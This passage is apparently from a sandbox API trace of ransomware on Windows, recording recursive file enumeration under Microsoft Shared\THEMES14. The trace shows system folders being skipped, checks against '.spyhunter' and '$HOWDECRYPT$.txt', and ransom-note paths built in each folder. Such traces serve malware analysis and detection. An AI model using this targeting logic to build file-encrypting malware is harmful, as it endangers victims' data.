returned 0x3824f8 [0090.759] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.759] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.759] lstrlenW (lpString="Windows") returned 7 [0090.759] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.760] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.760] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.760] lstrlenW (lpString="System Volume Information") returned 25 [0090.760] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 79 [0090.760] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.760] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.760] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.760] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 79 [0090.760] GetProcessHeap () returned 0x2c0000 [0090.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x381010 [0090.760] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1260) returned 0x3824f8 [0090.760] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.760] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.760] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\$HOWDECRYPT$.txt") returned 83 [0090.760] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\$HOWDECRYPT$.txt") returned 83 [0090.760] GetProcessHeap () returned 0x2c0000 [0090.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x341960 [0090.761] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1268) returned 0x3824f8 [0090.761] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.761] lstrcmpiW (lpString1="REFINED", lpString2="Windows") returned -1 [0090.761] lstrlenW (lpString="Windows") returned 7 [0090.761] lstrcmpiW (lpString1="REFINED", lpString2="$Recycle.bin") returned 1 [0090.761] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.761] lstrcmpiW (lpString1="REFINED", lpString2="System Volume Information") returned -1 [0090.761] lstrlenW (lpString="System Volume Information") returned 25 [0090.761] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED") returned 67 [0090.761] lstrcmpW (lpString1="REFINED", lpString2=".") returned 1 [0090.761] lstrcmpW (lpString1="REFINED", lpString2="..") returned 1 [0090.761] GetProcessHeap () returned 0x2c0000 [0090.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.761] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\*") returned 69 [0090.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.761] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.761] lstrlenW (lpString="Windows") returned 7 [0090.761] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.762] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.762] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.762] lstrlenW (lpString="System Volume Information") returned 25 [0090.762] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\.") returned 69 [0090.762] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.762] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.762] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.762] lstrlenW (lpString="Windows") returned 7 [0090.762] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.762] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.762] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.762] lstrlenW (lpString="System Volume Information") returned 25 [0090.762] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\..") returned 70 [0090.762] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.762] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.762] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.762] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.762] lstrlenW (lpString="Windows") returned 7 [0090.762] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.762] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.762] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.763] lstrlenW (lpString="System Volume Information") returned 25 [0090.763] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 79 [0090.763] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.763] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.763] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.763] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 79 [0090.763] GetProcessHeap () returned 0x2c0000 [0090.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3810f8 [0090.763] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1270) returned 0x3824f8 [0090.763] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.763] lstrcmpiW (lpString1="REFINED.ELM", lpString2="Windows") returned -1 [0090.763] lstrlenW (lpString="Windows") returned 7 [0090.763] lstrcmpiW (lpString1="REFINED.ELM", lpString2="$Recycle.bin") returned 1 [0090.763] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.763] lstrcmpiW (lpString1="REFINED.ELM", lpString2="System Volume Information") returned -1 [0090.764] lstrlenW (lpString="System Volume Information") returned 25 [0090.764] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM") returned 79 [0090.764] StrStrIW (lpFirst="REFINED.ELM", lpSrch=".spyhunter") returned 0x0 [0090.764] lstrcmpW (lpString1="REFINED.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.764] lstrcmpW (lpString1="REFINED.ELM", lpString2="_uninstalling_.png") returned 1 [0090.764] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM") returned 79 [0090.764] GetProcessHeap () returned 0x2c0000 [0090.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3811e0 [0090.764] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1278) returned 0x3824f8 [0090.764] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.764] lstrcmpiW (lpString1="REFINED.INF", lpString2="Windows") returned -1 [0090.764] lstrlenW (lpString="Windows") returned 7 [0090.764] lstrcmpiW (lpString1="REFINED.INF", lpString2="$Recycle.bin") returned 1 [0090.764] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.764] lstrcmpiW (lpString1="REFINED.INF", lpString2="System Volume Information") returned -1 [0090.764] lstrlenW (lpString="System Volume Information") returned 25 [0090.764] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF") returned 79 [0090.764] StrStrIW (lpFirst="REFINED.INF", lpSrch=".spyhunter") returned 0x0 [0090.765] lstrcmpW (lpString1="REFINED.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.765] lstrcmpW (lpString1="REFINED.INF", lpString2="_uninstalling_.png") returned 1 [0090.765] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF") returned 79 [0090.765] GetProcessHeap () returned 0x2c0000 [0090.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3812c8 [0090.765] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1280) returned 0x3824f8 [0090.765] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.765] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.765] lstrlenW (lpString="Windows") returned 7 [0090.765] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.765] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.765] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.765] lstrlenW (lpString="System Volume Information") returned 25 [0090.765] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 80 [0090.765] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.765] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.765] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.765] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 80 [0090.765] GetProcessHeap () returned 0x2c0000 [0090.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x341a50 [0090.765] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1288) returned 0x3824f8 [0090.765] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.765] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.766] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\$HOWDECRYPT$.txt") returned 84 [0090.766] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\$HOWDECRYPT$.txt") returned 84 [0090.766] GetProcessHeap () returned 0x2c0000 [0090.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x354ed8 [0090.766] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1290) returned 0x3824f8 [0090.766] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.766] lstrcmpiW (lpString1="RICEPAPR", lpString2="Windows") returned -1 [0090.766] lstrlenW (lpString="Windows") returned 7 [0090.766] lstrcmpiW (lpString1="RICEPAPR", lpString2="$Recycle.bin") returned 1 [0090.766] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.767] lstrcmpiW (lpString1="RICEPAPR", lpString2="System Volume Information") returned -1 [0090.767] lstrlenW (lpString="System Volume Information") returned 25 [0090.779] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR") returned 68 [0090.779] lstrcmpW (lpString1="RICEPAPR", lpString2=".") returned 1 [0090.779] lstrcmpW (lpString1="RICEPAPR", lpString2="..") returned 1 [0090.779] GetProcessHeap () returned 0x2c0000 [0090.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.780] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*") returned 70 [0090.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.848] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.848] lstrlenW (lpString="Windows") returned 7 [0090.848] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.848] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.848] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.848] lstrlenW (lpString="System Volume Information") returned 25 [0090.848] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\.") returned 70 [0090.848] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.848] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.848] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.848] lstrlenW (lpString="Windows") returned 7 [0090.848] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.848] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.848] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.848] lstrlenW (lpString="System Volume Information") returned 25 [0090.848] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\..") returned 71 [0090.848] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.848] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.848] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.848] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.848] lstrlenW (lpString="Windows") returned 7 [0090.848] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.848] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.848] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.848] lstrlenW (lpString="System Volume Information") returned 25 [0090.848] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 80 [0090.849] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.849] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.849] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.849] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 80 [0090.849] GetProcessHeap () returned 0x2c0000 [0090.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x341b40 [0090.849] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1298) returned 0x3824f8 [0090.849] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.849] lstrcmpiW (lpString1="RICEPAPR.ELM", lpString2="Windows") returned -1 [0090.849] lstrlenW (lpString="Windows") returned 7 [0090.849] lstrcmpiW (lpString1="RICEPAPR.ELM", lpString2="$Recycle.bin") returned 1 [0090.849] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.849] lstrcmpiW (lpString1="RICEPAPR.ELM", lpString2="System Volume Information") returned -1 [0090.849] lstrlenW (lpString="System Volume Information") returned 25 [0090.849] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM") returned 81 [0090.849] StrStrIW (lpFirst="RICEPAPR.ELM", lpSrch=".spyhunter") returned 0x0 [0090.849] lstrcmpW (lpString1="RICEPAPR.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.849] lstrcmpW (lpString1="RICEPAPR.ELM", lpString2="_uninstalling_.png") returned 1 [0090.849] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM") returned 81 [0090.849] GetProcessHeap () returned 0x2c0000 [0090.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x341c30 [0090.849] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12a0) returned 0x3824f8 [0090.849] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.849] lstrcmpiW (lpString1="RICEPAPR.INF", lpString2="Windows") returned -1 [0090.850] lstrlenW (lpString="Windows") returned 7 [0090.850] lstrcmpiW (lpString1="RICEPAPR.INF", lpString2="$Recycle.bin") returned 1 [0090.850] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.850] lstrcmpiW (lpString1="RICEPAPR.INF", lpString2="System Volume Information") returned -1 [0090.850] lstrlenW (lpString="System Volume Information") returned 25 [0090.850] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 81 [0090.850] StrStrIW (lpFirst="RICEPAPR.INF", lpSrch=".spyhunter") returned 0x0 [0090.850] lstrcmpW (lpString1="RICEPAPR.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.850] lstrcmpW (lpString1="RICEPAPR.INF", lpString2="_uninstalling_.png") returned 1 [0090.850] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 81 [0090.850] GetProcessHeap () returned 0x2c0000 [0090.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x341d20 [0090.850] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12a8) returned 0x3824f8 [0090.850] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.850] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.850] lstrlenW (lpString="Windows") returned 7 [0090.850] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.850] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.850] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.851] lstrlenW (lpString="System Volume Information") returned 25 [0090.851] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 81 [0090.851] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.851] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.851] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.851] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 81 [0090.851] GetProcessHeap () returned 0x2c0000 [0090.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x341e10 [0090.851] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12b0) returned 0x3824f8 [0090.851] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.851] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.851] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\$HOWDECRYPT$.txt") returned 85 [0090.851] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\$HOWDECRYPT$.txt") returned 85 [0090.851] GetProcessHeap () returned 0x2c0000 [0090.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354fd0 [0090.851] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12b8) returned 0x3824f8 [0090.851] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.851] lstrcmpiW (lpString1="RIPPLE", lpString2="Windows") returned -1 [0090.851] lstrlenW (lpString="Windows") returned 7 [0090.852] lstrcmpiW (lpString1="RIPPLE", lpString2="$Recycle.bin") returned 1 [0090.852] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.852] lstrcmpiW (lpString1="RIPPLE", lpString2="System Volume Information") returned -1 [0090.852] lstrlenW (lpString="System Volume Information") returned 25 [0090.852] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE") returned 66 [0090.852] lstrcmpW (lpString1="RIPPLE", lpString2=".") returned 1 [0090.852] lstrcmpW (lpString1="RIPPLE", lpString2="..") returned 1 [0090.852] GetProcessHeap () returned 0x2c0000 [0090.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.852] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*") returned 68 [0090.852] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.852] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.852] lstrlenW (lpString="Windows") returned 7 [0090.853] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.853] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.853] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.853] lstrlenW (lpString="System Volume Information") returned 25 [0090.853] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\.") returned 68 [0090.853] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.853] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.853] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.853] lstrlenW (lpString="Windows") returned 7 [0090.853] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.853] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.853] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.853] lstrlenW (lpString="System Volume Information") returned 25 [0090.853] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\..") returned 69 [0090.853] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.853] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.853] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.853] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.853] lstrlenW (lpString="Windows") returned 7 [0090.853] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.853] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.853] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.853] lstrlenW (lpString="System Volume Information") returned 25 [0090.853] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 78 [0090.853] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.853] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.854] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.854] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 78 [0090.854] GetProcessHeap () returned 0x2c0000 [0090.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3813b0 [0090.854] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12c0) returned 0x3824f8 [0090.854] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.854] lstrcmpiW (lpString1="RIPPLE.ELM", lpString2="Windows") returned -1 [0090.854] lstrlenW (lpString="Windows") returned 7 [0090.854] lstrcmpiW (lpString1="RIPPLE.ELM", lpString2="$Recycle.bin") returned 1 [0090.854] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.854] lstrcmpiW (lpString1="RIPPLE.ELM", lpString2="System Volume Information") returned -1 [0090.854] lstrlenW (lpString="System Volume Information") returned 25 [0090.854] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM") returned 77 [0090.854] StrStrIW (lpFirst="RIPPLE.ELM", lpSrch=".spyhunter") returned 0x0 [0090.854] lstrcmpW (lpString1="RIPPLE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.854] lstrcmpW (lpString1="RIPPLE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.854] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM") returned 77 [0090.854] GetProcessHeap () returned 0x2c0000 [0090.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x381498 [0090.854] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12c8) returned 0x3824f8 [0090.854] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.854] 